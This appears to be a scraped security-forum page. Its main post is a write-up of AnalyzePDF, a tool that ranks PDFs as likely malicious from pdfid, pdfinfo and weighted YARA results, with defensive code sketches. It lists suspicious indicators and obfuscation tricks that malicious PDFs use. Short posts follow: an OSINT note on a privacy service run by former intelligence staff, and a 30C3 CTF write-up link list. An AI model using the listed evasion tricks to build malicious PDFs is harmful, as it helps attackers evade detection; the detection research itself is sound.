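Here is that minimal sketch (mine, not the AnalyzePDF implementation) of the 'header within the first 1024 bytes' check, simply looking for '%PDF-' anywhere in the first 1 KB rather than only at offset 0:

import sys

def looks_like_pdf(path):
    # The spec allows the header to appear anywhere in the first 1024 bytes,
    # so don't assume it sits at offset 0 like most file identifiers do.
    with open(path, 'rb') as f:
        head = f.read(1024)
    return b'%PDF-' in head

if __name__ == '__main__':
    for name in sys.argv[1:]:
        print('%s -> %s' % (name, 'PDF' if looks_like_pdf(name) else 'not identified as PDF'))

The same idea is easy to express as a YARA rule ('%PDF-' somewhere in the first 1024 bytes), which is the other option the post mentions.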
[h=3]Stats[/h]
Files analyzed (no duplicates found between clean & dirty):

[TABLE=width: 50%]
[TR] [TH]Class[/TH] [TH]Type[/TH] [TH]Count[/TH] [/TR]
[TR] [TD]Dirty[/TD] [TD]Pre-Dup[/TD] [TD]22,342[/TD] [/TR]
[TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]11,147[/TD] [/TR]
[TR] [TD]Clean[/TD] [TD]Pre-Dup[/TD] [TD]2,530[/TD] [/TR]
[TR] [TD]Clean[/TD] [TD]Post-Dup[/TD] [TD]2,529[/TD] [/TR]
[TR] [TD=colspan: 2]Total Files Analyzed:[/TD] [TD]13,676[/TD] [/TR]
[/TABLE]

I've collected more than enough data to put together a paper or presentation, but I feel that's been played out already, so if you want more than what's outlined here just ping me. Instead of dragging this post on by showing each and every stat that was pulled, I feel it's more useful to show a high level comparison of what was detected the most in each set and some anomalies.

[h=4]Ah-Ha's[/h]
[*]None of the clean files had incorrect file headers/versions.
[*]There wasn't a single keyword/attribute parsed from the clean files that covered more than 4.55% of its entire data set class. This helps show the uniqueness of these files vs. malicious actors reusing things.
[*]The dates within the clean files were generally unique, while the date fields of the dirty files were more clustered together - again, reuse?
[*]None of the values for the keywords/attributes of the clean files were flagged by pdfid as attempted obfuscation.
[*]Clean files never had '/Colors > 2^24' above 0, while some dirty files did.
[*]Rarely did a clean file have a high count of JavaScript in it, while dirty files ranged from 5-149 occurrences per file.
[*]'/JBIG2Decode' was never above '0' in any clean file.
[*]'/Launch' wasn't used much in either data set, but was still more common in the dirty one.
[*]Dirty files have far more characters after the last %%EOF (300+ characters is a good check).
[*]Single page PDF's have a higher likelihood of being malicious - no duh.
[*]'/OpenAction' is far more common in malicious files.

[h=4]YARA signatures[/h]
I've also included some PDF YARA rules that I've created as a separate file so you can use those to get started. YARA isn't really required, but I'm making it that way for the time being because it's helpful... so I have the default rules location pointing to REMnux's copy of MACB's rules unless otherwise specified.
Clean data set:
Dirty data set:
Signatures that triggered across both data sets:
Cool... so we know we have some rules that work well and others that might need adjusting, but they still help!

[h=4]What to look for[/h]
So we have some data to go off of... what are some additional things we can take away from all of this and incorporate into our analysis tool so we don't forget about them and/or stop repeating steps?

[*]Header
In addition to possibly sitting after the first 8 bytes, I found it useful to look at the specific version within the header. This should normally look like "%PDF-M.N." where M.N is the Major/Minor version... however, the above mentioned 'low header' needs to be looked for as well. Knowing this, we can look for invalid PDF version numbers or, digging deeper, correlate the PDF's features/elements to the version number and flag on mismatches. Here are some examples of what I mean, and more reasons why reading those dry specs is useful:
- If FlateDecode was introduced in v1.2 then it shouldn't be in any version below.
- If JavaScript and EmbeddedFiles were introduced in v1.3 then they shouldn't be in any version below.
- If JBIG2 was introduced in v1.4 then it shouldn't be in any version below.
(A rough sketch of such a mismatch check is shown right after this item.)
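Here is that rough sketch (mine, not the AnalyzePDF code). The feature-to-version mapping follows the examples above, and the header string plus keyword counts are assumed to come from whatever parser you wrap (pdfid/pdfinfo in this post):

import re

# PDF version in which each feature was introduced (per the examples above)
INTRODUCED_IN = {
    '/FlateDecode': 1.2,
    '/JS': 1.3,
    '/JavaScript': 1.3,
    '/EmbeddedFile': 1.3,
    '/JBIG2Decode': 1.4,
}

def version_mismatches(header, keyword_counts):
    # Return the features that should not exist for the claimed PDF version.
    m = re.search(r'%PDF-(\d\.\d)', header or '')
    if not m:
        return ['invalid or missing %PDF-M.N header']
    claimed = float(m.group(1))
    hits = []
    for feature, introduced in INTRODUCED_IN.items():
        if keyword_counts.get(feature, 0) > 0 and claimed < introduced:
            hits.append('%s present but header claims %.1f' % (feature, claimed))
    return hits

# example: a file claiming to be PDF 1.2 that contains JavaScript
print(version_mismatches('%PDF-1.2', {'/JS': 1, '/FlateDecode': 2}))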
[*]Body
This is where all of the data is (supposed to be) stored: objects (strings, names, streams, images, etc.). So what kinds of semi-intelligent things can we do here?
- Look for object/stream mismatches, e.g. indirect objects must be delimited by 'obj' and 'endobj', so if the number of 'obj' mentions differs from the number of 'endobj' mentions then it might be something of interest.
- Are there any questionable features/elements within the PDF? JavaScript doesn't immediately make the file malicious, as mentioned earlier; however, it's found in ~90% of malicious PDF's based on others' and my own research. '/RichMedia' indicates the use of Flash (could be leveraged for heap sprays); '/AA', '/OpenAction', '/AcroForm' indicate that an automatic action is to be performed (often used to execute JavaScript); '/JBIG2Decode', '/Colors' could indicate the use of vulnerable filters (based on the data above, maybe we should look for colors with a value greater than 2^24); '/Launch', '/URL', '/Action', '/F', '/GoToE', '/GoToR' point to opening external programs, places to visit and redirection games.
- Obfuscation: multiple filters ('/FlateDecode', '/ASCIIHexDecode', '/ASCII85Decode', '/LZWDecode', '/RunLengthDecode'). The streams within a PDF file may have filters applied to them (usually for compressing/encoding the data). While this is common, it's not common for benign PDF files to have multiple filters applied; this behavior is commonly associated with malicious files trying to thwart A/V detection by making it work harder. Other obfuscation tricks: separating code over multiple objects, placing code where it shouldn't be (e.g. Author, Keywords, etc.), white space randomization, comment randomization, variable name randomization, string randomization, function name randomization, integer obfuscation, block randomization.
- Any suspicious keywords that could mean something malicious when seen with others? eval, array, String.fromCharCode, getAnnots, getPageNumWords, getPageNthWords, this.info, unescape, %u9090
[*]Xref
The first object has an ID 0 and always contains one entry with generation number 65535. This is at the head of the list of free objects (note the letter 'f' that means free). The last object in the cross reference table uses the generation number 0. Translation please? Take a look at the following Xref: knowing how it's supposed to look, we can search for Xrefs that don't adhere to this structure.
[*]Trailer
Provides the offset of the Xref (startxref) and contains the EOF marker, which is supposed to be a single line with "%%EOF" marking the end of the trailer/document. Each trailer will be terminated by these characters and should also contain the '/Prev' entry, which points to the previous Xref. Any updates to the PDF usually result in appending additional elements to the end of the file; this makes it pretty easy to spot PDF's with multiple updates or additional characters after what's supposed to be the EOF.
[*]Misc.
Creation dates (both the format and whether a particular one is known to be used), Title, Author, Producer, Creator, Page count.

[h=2]The Code[/h]
So what now? We have plenty of data to go on - some previously known, but some extremely new and helpful.
It's one thing to know that most files with JavaScript, or that are one (1) page, have a higher tendency of being malicious... but what about some of the other characteristics of these files? By themselves, a single keyword/attribute might not stick out that much, but what happens when you start to combine them? Welp, hang on because we're going to put this all together.

[h=3]File Identification[/h]
In order to account for the header issue, I decided the tool itself would look within the first 1024 bytes instead of relying on other file identification tools: Another way, so this could be detected whether or not this tool was used, was to create a YARA rule such as:

[h=3]Wrap pdfinfo[/h]
Through my testing I found this tool to be more reliable than pdfid in some areas, such as:
[*]Determining if there are any Xref errors produced when trying to read the PDF
[*]Looking for any unterminated hex strings etc.
[*]Detecting EOF errors

[h=3]Wrap pdfid[/h]
[*]Read the header. *pdfid will show exactly what's there and not try to convert it*
[*]_Attempt_ to determine the number of pages
[*]Look for object/stream mismatches
[*]Not only look for JavaScript but also determine if there's an abnormally high amount
[*]Look for other suspicious/commonly abused elements (AcroForm, OpenAction, AdditionalAction, Launch, embedded files etc.)
[*]Look for data after EOF
[*]Calculate a few different entropy scores
Next, perform some automagical checks and hold on to the results for later calculations.

[h=3]Scan with YARA[/h]
While there are some pre-populated conditions built into the tool that already produce a ranking, the ability to add/modify your own is extremely easy. Additionally, since I'm a big fan of YARA, I incorporated it into this as well. There are many benefits to this, such as being able to write a rule for header evasion, version-to-element mismatching, or even flagging on known malicious authors or producers. The biggest strength, however, is the ability to add a 'weight' field in the meta section of the YARA rules. This lets the user state how good a rule is: if the rule triggers on the PDF, its weighted value is held on to and incorporated later into the overall calculation process, which may increase the file's maliciousness score. Here's what the YARA parsing looks like when checking the meta field: And here's another YARA rule with that section highlighted for those who aren't sure what I'm talking about:

If the (-m) option is supplied then, if _any_ YARA rule triggers on the PDF file, it will be moved to another directory of your choosing. This is important to note because one of your rules may hit on the file but not be displayed in the output, especially if it doesn't have a weight field.

Once the analysis has completed, the calculation process starts. This is two-phase:
[*]Anything noted from pdfinfo and pdfid is evaluated against some pre-determined combinations I configured. These are easy enough to modify as needed, but they've been very reliable in my testing... but hey, things change! Instead of moving on once one of the combination sets is met, I let the scoring go through each one and add the additional points to the overall score, if warranted. This allows several 'smaller' things to bundle up into something of interest rather than passing them up individually.
[*]Any YARA rule that triggered on the PDF file has its weighted value parsed from the rule and added to the overall score. This helps bump up a file's score or immediately flag it as suspicious if you have a rule you really want to alert on (a minimal sketch of this weight-parsing idea is shown right after this list).
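Here is that minimal sketch (mine, not the actual AnalyzePDF code) of the weighted-YARA idea, assuming yara-python is installed and that your rules carry a 'weight' value in their meta section:

import sys
import yara

def yara_score(rules_path, pdf_path):
    # Any matching rule contributes its 'weight' meta value to the total score.
    rules = yara.compile(filepath=rules_path)
    score = 0
    for match in rules.match(pdf_path):
        weight = int(match.meta.get('weight', 0))   # rules without a weight add nothing
        score += weight
        print('rule %s hit (weight %d)' % (match.rule, weight))
    return score

if __name__ == '__main__':
    print('total YARA-derived score: %d' % yara_score(sys.argv[1], sys.argv[2]))

Whether that score alone marks the file as suspicious, or simply feeds the combined ranking, is a policy choice; AnalyzePDF folds it into the overall calculation described above.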
So what does it look like in action? Here's a picture I tweeted a little while back of it analyzing a PDF exploiting CVE-2013-0640:

[h=3]Download[/h]
I've had this code for quite a while and hadn't gotten around to writing up a post to release it with, but after reading a former coworker's blog post last night I realized it was time to just write something up and get this out there, as there are still people asking for something that employs some of these capabilities (e.g. weight ranking). Is this 100% right all the time? No... let's be real. I've come across situations where a benign file was flagged as malicious based on its characteristics, and that's going to happen from time to time. Not all PDF creators adhere to the required specifications, and some users think it's fun to embed or add things to PDF's when it's not necessary. What this helps do is give a higher ranking to files that require closer attention, or help someone determine if they should open a file right away vs. send it to someone else for analysis (e.g. deploy something like this on a web server somewhere and let the user upload their questionable file to it and get back a "yes it's ok" or "no, sending it for analysis"). AnalyzePDF can be downloaded on my github.

[h=2]Further Reading[/h]
Research papers (one | two | three)
[PDF] PDFTricks
PDF Overview

Posted by hiddenillusion
Sursa: :: hiddenillusion ::: AnalyzePDF - Bringing the Dirt Up to the Surface
  23. AnalyzePDF.py

Analyzes PDF files by looking at their characteristics in order to add some intelligence into the determination of them being malicious or benign.

Requirements
* pdfid
* pdfinfo
* yara

Usage
$ python AnalyzePDF.py -h
usage: AnalyzePDF.py [-h] [-m MOVE] [-y YARARULES] Path

Produces a high level overview of a PDF to quickly determine if further
analysis is needed based on it's characteristics

positional arguments:
  Path                  Path to directory/file(s) to be scanned

optional arguments:
  -h, --help            show this help message and exit
  -m MOVE, --move MOVE  Directory to move files triggering YARA hits to
  -y YARARULES, --yararules YARARULES
                        Path to YARA rules. Rules should contain a weighted
                        score in the metadata section. (i.e. weight = 3)

example: python AnalyzePDF.py -m tmp/badness -y foo/pdf.yara bar/getsome.pdf

Restrictions
Free to use for non-commercial. Give credit where credit is due.

Sursa & Download: https://github.com/hiddenillusion/AnalyzePDF
  24. [h=1]A Tor-like service run by former NSA/TAO Director & CIA National Clandestine Service Senior Officer[/h] Hi all, there's a Tor-like service run by a former NSA/TAO Director and a CIA National Clandestine Service Senior Officer. It appears to be a commercial onion-routing privacy service for US enterprises and government agencies. It's called NetAbstraction: NetAbstraction | Internet Privacy Protection

"NetAbstraction is a Cloud-based service that obscures and varies your network pathways, while protecting your identity and your systems."

They say they fully cooperate with Law Enforcement (from NetAbstraction | Internet Privacy Protection).

Behind NetAbstraction there's a company, Cutting Edge CA: Cutting Edge C. A. | Advanced Cloud Applications

The president and CTO of Cutting Edge CA is a former NSA "Tailored Access Operations" (TAO) Senior Leader, Ms. Barbara Hunt (Barbara Hunt | LinkedIn). From Ms. Hunt's public LinkedIn profile: "My last position in the Intelligence Community (2008-2012) was as Director of Capabilities for Tailored Access Operations at the National Security Agency. As a member of NSA/TAO's senior leadership team, was responsible for end-to-end development and capabilities delivery for a large scale computer network exploitation effort"

Also working there is a former CIA Senior Operations Officer with 24 years in the National Clandestine Service, Mr. Bay. From Cutting Edge C. A. | Advanced Cloud Applications: "Mr. Bay is a retired CIA Senior Operations Officer with 24 years of experience conducting a full range of intelligence operations for the National Clandestine Service, including operational innovation and implementation of telecommunications and information technology programs. Mr. Bay also brings extensive experience in alternate persona research, planning, acquisition, and use."

It would be very interesting if someone spent some more time investigating it, to get a more in-depth picture than just my early OSINT. Former spies, experts in COMINT and SIGINT, running an online privacy service? mmmmmmmmmmm...

-- Fabio Pietrosanti (naif)
HERMES - Center for Transparency and Digital Human Rights
Makers of Tor2Web, GlobaLeaks, LeakDirectory - http://globaleaks.org - tor2web: browse the anonymous internet

Sursa: https://lists.torproject.org/pipermail/tor-talk/2014-January/031554.html
  25. 30C3 CTF writeups collection

PWN
- cwitscher 350: http://pastebin.com/jMbTX521
- bittorrent 400
- todos 300: http://codezen.fr/2013/12/30c3-ctf-pwn-300-todos-write-up-sql-injection-ret2libc/ , http://balidani.blogspot.in/2013/12/30c3-ctf-todos-writeup.html
- bigdata 400
- DOGE1 100: http://thehackerblog.com/such-ctf-very-wow-30c3-doge1-writeup/ , http://tasteless.se/2013/12/30c3-ctf-doge1-writeup/
- DOGE2 400: http://pastebin.com/81CY5Pg2
- HolyChallenge 500: http://blog.dragonsector.pl/2013/12/30c3-ctf-holychallenge-pwn-500.html

SANDBOX
- int80 300: http://blog.dragonsector.pl/2013/12/30c3-ctf-int80-sandbox-300.html
- yass 400
- PyExec 300: http://blog.dragonsector.pl/2013/12/30c3-ctf-pyexec-sandbox-300.html , http://delimitry.blogspot.in/2013/12/30c3-ctf-2013-sandbox-300-pyexec-writeup.html

MISC
- notesEE 400
- rsync 200: http://tasteless.se/2013/12/30c3-ctf-rsync-writeup/ , http://dr0x0n.blogspot.in/2013/12/writeup-30c3-ctf-2013-rsync-200-rsync.html
- cableguy 100

NUMBERS
- fourier 200: http://d.hatena.ne.jp/waidotto/20131230
- guess 100: http://tasteless.se/2013/12/30c3-ctf-guess-writeup/
- matsch 300
- angler 300: http://blog.zachorr.com/30C3-CTF-Numbers-300-angler/

Posted by Deva
30C3 CTF – PWN 300